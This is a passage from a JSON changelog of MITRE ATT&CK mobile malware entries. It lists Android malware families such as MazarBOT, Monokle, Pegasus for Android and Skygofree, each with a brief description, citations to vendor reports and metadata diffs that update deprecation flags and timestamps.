only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0485", + "external_id": "S0485" + }, + { + "source_name": "oxide", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "briar", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "ricinus", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "darkmatter", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Mandrake", + "oxide", + "briar", + "ricinus", + "darkmatter" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:26.424000+00:00\", \"old_value\": \"2025-04-16 21:22:08.595000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:40.875000+00:00", + "modified": "2025-04-25 14:40:28.053000+00:00", + "name": "MazarBOT", + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0303", + "external_id": "S0303" + }, + { + "source_name": "MazarBOT", + "description": "(Citation: Tripwire-MazarBOT)" + }, + { + "source_name": "Tripwire-MazarBOT", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. Retrieved December 23, 2016.", + "url": "https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:28.053000+00:00\", \"old_value\": \"2025-04-16 21:22:09.084000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-04 14:28:14.181000+00:00", + "modified": "2025-04-25 14:40:29.512000+00:00", + "name": "Monokle", + "description": "[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. It is developed for Android, but there are some code artifacts that suggests an iOS version may be in development.(Citation: Lookout-Monokle)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0407", + "external_id": "S0407" + }, + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Monokle" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "J\u00f6rg Abraham, EclecticIQ" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:29.512000+00:00\", \"old_value\": \"2025-04-16 21:22:09.753000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:36.707000+00:00", + "modified": "2025-04-25 14:40:19.154000+00:00", + "name": "NotCompatible", + "description": "[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. (Citation: Lookout-NotCompatible)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0299", + "external_id": "S0299" + }, + { + "source_name": "NotCompatible", + "description": "(Citation: Lookout-NotCompatible)" + }, + { + "source_name": "Lookout-NotCompatible", + "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:19.154000+00:00\", \"old_value\": \"2025-04-16 21:22:05.573000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:44.540000+00:00", + "modified": "2025-04-25 14:40:40.325000+00:00", + "name": "OBAD", + "description": "OBAD is an Android malware family. (Citation: TrendMicro-Obad)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0286", + "external_id": "S0286" + }, + { + "source_name": "OBAD", + "description": "(Citation: TrendMicro-Obad)" + }, + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:40.325000+00:00\", \"old_value\": \"2025-04-16 21:22:13.949000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--2074b2ad-612e-4758-adce-7901c1b49bbc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:45.155000+00:00", + "modified": "2025-04-25 14:40:16.618000+00:00", + "name": "OldBoot", + "description": "[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. (Citation: HackerNews-OldBoot)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0285", + "external_id": "S0285" + }, + { + "source_name": "OldBoot", + "description": "(Citation: HackerNews-OldBoot)" + }, + { + "source_name": "HackerNews-OldBoot", + "description": "Sudhir K Bansal. (2014, January 28). First widely distributed Android bootkit Malware infects more than 350,000 Devices. Retrieved December 21, 2016.", + "url": "http://thehackernews.com/2014/01/first-widely-distributed-android.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:16.618000+00:00\", \"old_value\": \"2025-04-16 21:22:04.440000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:43.527000+00:00", + "modified": "2025-04-25 14:40:39.221000+00:00", + "name": "PJApps", + "description": "[PJApps](https://attack.mitre.org/software/S0291) is an Android malware family. (Citation: Lookout-EnterpriseApps)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0291", + "external_id": "S0291" + }, + { + "source_name": "PJApps", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:39.221000+00:00\", \"old_value\": \"2025-04-16 21:22:13.454000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-07-10 15:35:43.217000+00:00", + "modified": "2025-04-25 14:40:38.069000+00:00", + "name": "Pallas", + "description": "[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070).(Citation: Lookout Dark Caracal Jan 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0399", + "external_id": "S0399" + }, + { + "source_name": "Pallas", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pallas" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:38.069000+00:00\", \"old_value\": \"2025-04-16 21:22:12.993000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:41.202000+00:00", + "modified": "2025-04-25 14:40:32.245000+00:00", + "name": "Pegasus for Android", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. (Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0316", + "external_id": "S0316" + }, + { + "source_name": "Pegasus for Android", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Chrysaor", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + }, + { + "source_name": "Google-Chrysaor", + "description": "Rich Cannings et al.. (2017, April 3). An investigation of Chrysaor Malware on Android. Retrieved April 16, 2017.", + "url": "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pegasus for Android", + "Chrysaor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:32.245000+00:00\", \"old_value\": \"2025-04-16 21:22:10.874000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:38.274000+00:00", + "modified": "2025-04-25 14:40:22.773000+00:00", + "name": "RCSAndroid", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. (Citation: TrendMicro-RCSAndroid)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0295", + "external_id": "S0295" + }, + { + "source_name": "RCSAndroid", + "description": "(Citation: TrendMicro-RCSAndroid)" + }, + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RCSAndroid" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:22.773000+00:00\", \"old_value\": \"2025-04-16 21:22:06.991000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-14 14:52:02.949000+00:00", + "modified": "2025-04-25 14:40:29.878000+00:00", + "name": "Red Alert 2.0", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0539", + "external_id": "S0539" + }, + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Red Alert 2.0" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:29.878000+00:00\", \"old_value\": \"2025-04-16 21:22:09.903000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-08-07 15:57:12.877000+00:00", + "modified": "2025-04-25 14:40:37.303000+00:00", + "name": "Riltok", + "description": "[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials.(Citation: Kaspersky Riltok June 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0403", + "external_id": "S0403" + }, + { + "source_name": "Kaspersky Riltok June 2019", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Riltok" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:37.303000+00:00\", \"old_value\": \"2025-04-16 21:22:12.694000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-23 13:36:07.816000+00:00", + "modified": "2025-04-25 14:40:14.047000+00:00", + "name": "Rotexy", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality.(Citation: securelist rotexy 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0411", + "external_id": "S0411" + }, + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan \u2013 banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Rotexy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:14.047000+00:00\", \"old_value\": \"2025-04-16 21:22:03.463000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:48.917000+00:00", + "modified": "2025-04-25 14:40:31.880000+00:00", + "name": "RuMMS", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) is an Android malware family. (Citation: FireEye-RuMMS)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0313", + "external_id": "S0313" + }, + { + "source_name": "RuMMS", + "description": "(Citation: FireEye-RuMMS)" + }, + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:31.880000+00:00\", \"old_value\": \"2025-04-16 21:22:10.719000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:38.690000+00:00", + "modified": "2025-04-25 14:40:39.602000+00:00", + "name": "ShiftyBug", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. (Citation: Lookout-Adware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0294", + "external_id": "S0294" + }, + { + "source_name": "ShiftyBug", + "description": "(Citation: Lookout-Adware)" + }, + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:39.602000+00:00\", \"old_value\": \"2025-04-16 21:22:13.608000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-24 21:41:36.719000+00:00", + "modified": "2025-04-25 14:40:42.577000+00:00", + "name": "SilkBean", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) is a piece of Android surveillanceware containing comprehensive remote access tool (RAT) functionality that has been used in targeting of the Uyghur ethnic group.(Citation: Lookout Uyghur Campaign)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0549", + "external_id": "S0549" + }, + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SilkBean" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:42.577000+00:00\", \"old_value\": \"2025-04-16 21:22:14.758000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-11-21 19:16:34.526000+00:00", + "modified": "2025-04-25 14:40:46.008000+00:00", + "name": "SimBad", + "description": "[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name \"SimBad\" was derived from the fact that most of the infected applications were simulator games. The adware was controlled using an instance of the open source framework Parse Server.(Citation: CheckPoint SimBad 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0419", + "external_id": "S0419" + }, + { + "source_name": "CheckPoint SimBad 2019", + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SimBad" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:46.008000+00:00\", \"old_value\": \"2025-04-16 21:22:16.143000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:23.488000+00:00", + "name": "Skygofree", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. (Citation: Kaspersky-Skygofree)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0327", + "external_id": "S0327" + }, + { + "source_name": "Skygofree", + "description": "(Citation: Kaspersky-Skygofree)" + }, + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Skygofree" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": 